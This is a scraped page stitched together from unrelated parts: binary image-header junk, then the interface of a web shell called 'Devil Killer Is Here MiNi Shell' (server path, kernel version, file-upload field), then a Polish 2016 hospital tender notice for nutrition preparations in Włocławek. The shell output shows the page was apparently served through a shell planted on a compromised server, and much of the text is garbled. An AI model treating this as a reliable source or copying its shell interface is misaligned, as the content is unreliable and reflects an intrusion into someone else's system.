JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160913/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160913/308034-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 308034 - 2016
              z dnia 2016-09-13 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Włocławek: DOSTAWA PREPARATÓW DO ŻYWIENIA POZA I DOJELITOWEGO <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Wojewódzki Szpital Specjalistyczny we Włocławku, krajowy numer identyfikacyjny
              34141172700000, ul.
              Ul. Wieniecka 
              49,
              87800  
              Włocławek, woj.
              kujawsko-pomorskie, państwo
              , tel.
              54 412 94 13, e-mail
              szpital_wloclawek@interia.pl, faks
              54 412 94 13.
              <br />
              Adres strony internetowej (URL): www.szpital.wloclawek.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Samodzielny Publiczny Zakład Opieki Zdrowotnej </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br />nie</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.szpital.wloclawek.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br />nie</div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br />nie</div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />tak<br />
                Adres:
                <br />Wojewódzki Szpital Specjalistyczny we Włocławku ul. Wieniecka 49, 87-800 Włocławek pok. 304 Administracja III piętro </div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br />nie</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>DOSTAWA PREPARATÓW DO ŻYWIENIA POZA I DOJELITOWEGO <br /><b>Numer referencyjny: </b>DZP/56/2016<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest sukcesywna dostawa preparatów do żywienia poza i dojelitowego do Apteki Szpitalnej Wojewódzkiego Szpitala Specjalistycznego im. błogosławionego księdza Jerzego Popiełuszki we Włocławku przez okres 12 miesięcy licząc od dnia zawarcia umowy w następującym asortymencie : 

Dokładny opis przedmiotu zamówienia zawarty jest w załącznikach do niniejszego ogłoszenia<br /><br /><b>II.5) Główny kod CPV: </b>33692000-7<br /><b> Dodatkowe kody CPV:</b>33692210-2<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 12<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                <br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                Warunek Zamawiający uzna za spełniony jeżeli Wykonawca wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 1 dostawę do każdej z Części zamówienia w zakresie dostawy preparatów do żywienia o wartości minimum PLN brutto:

Część nr 1	 1 600,00 PLN	Część nr 5	129 000,00 PLN
Część nr 2	    600,00 PLN	Część nr 6	   5 000,00 PLN
Część nr 3	 2 700,00 PLN	Część nr 7	  31 000,00 PLN
Część nr 4	 2 100,00 PLN	Część nr 8	    5 200,00 PLN
Część nr 9	 2.000,00 PLN	Część nr 10	  10 000,00 PLN
Część nr 11	 7 400,00 PLN		

w ramach jednego kontraktu  odpowiednio w każdej Części. W przypadku gdy Wykonawca składa ofertę na kilka Części, Zamawiający dopuszcza wykazanie się przez Wykonawcę jedną dostawą w ramach jednego kontraktu na wartość równą lub wyższą od sumy wartości wskazanych w ww. warunku obliczonych dla danych Części.
Np. w przypadku gdyby Wykonawca składał ofertę na Część nr 1 i Część nr 7 to może wykazać się doświadczeniem w wykonaniu co najmniej 1 dostawy w ramach jednego kontraktu na wartość co najmniej 32 tyś. 600 PLN brutto. 

</div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 uPzp, w następującym zakresie: 
W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu:
a)	informacji z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 uPzp wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
b)	odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 uPzp;
c)	oświadczenia wykonawcy o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo - w przypadku wydania takiego wyroku lub decyzji - dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności;
d)	oświadczenia wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne;
e)	oświadczenia wykonawcy o niezaleganiu z opłacaniem podatków i opłat lokalnych, o których mowa w ustawie z dnia 12 stycznia 1991 r. o podatkach i opłatach lokalnych (Dz. U. z 2016 r. poz. 716);
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Zamawiający wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie aktualnych na dzień złożenia oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 uPzp, w następującym zakresie: 

1)	na potwierdzenie spełniania warunku, o którym mowa w rozdziale IV ust. 1 pkt 1 lit. c SIWZ Zamawiający wymaga przedłożenia  wykazu wykonanych dostaw na zasadach określonych poniżej (w zakresie warunków udziału w postępowaniu określonych w rozdziale IV ust. 1 pkt 1 lit. a i b SIWZ Zamawiający nie żąda przedłożenia dokumentów):

- wykazu wykonanych dostaw, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie  co najmniej 1 dostawę do każdej z Części w zakresie dostawy preparatów do żywienia o minimalnej wartości brutto wskazanej w tabeli w ust. 1 lit. c niniejszego paragrafu,
wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane, 
oraz załączeniem dowodów określających czy te dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego dostawy były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, 
a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1.Formularz ofertowy, zgodnie z załącznikiem nr 1 do SIWZ.
2. Formularz asortymentowo  cenowy, zgodnie z załącznikami nr 2A do 2K do SIWZ.
3.Jeżeli wykonawca polega na zdolnościach lub sytuacji innego podmiotu (dalej jako ,,Podmiot Udostępniający) na zasadach określonych w art. 22a uPzp, w celu dysponowania niezbędnymi zasobami w stopniu umożliwiającym należyte wykonanie zamówienia publicznego Zamawiający wymaga przedłożenia zobowiązania Podmiotu Udostępniającego (oryginał w formie pisemnej), które będzie określało:
a) zakres dostępnych wykonawcy zasobów innego podmiotu;
b) sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia publicznego;
c) zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego.
***(ze zobowiązania Podmiotu Udostępniającego powinna wynikać gwarancja rzeczywistego dostępu wykonawcy do zasobów Podmiotu Udostępniającego) 
4.	W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, Zamawiający żąda złożenia wraz z ofertą deklaracji zgodności CE dotyczącej oferowanych produktów.
5.	Pełnomocnictwo w formie oryginału lub kopii poświadczonej notarialnie w sytuacji, gdy Wykonawca składa ofertę przez ustanowionego pełnomocnika. Pełnomocnictwo musi zawierać w szczególności ustanowionego pełnomocnika oraz zakres jego umocowania.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>60</td></tr><tr><td>Termin płatności</td><td>20</td></tr><tr><td>Termin dostawy</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
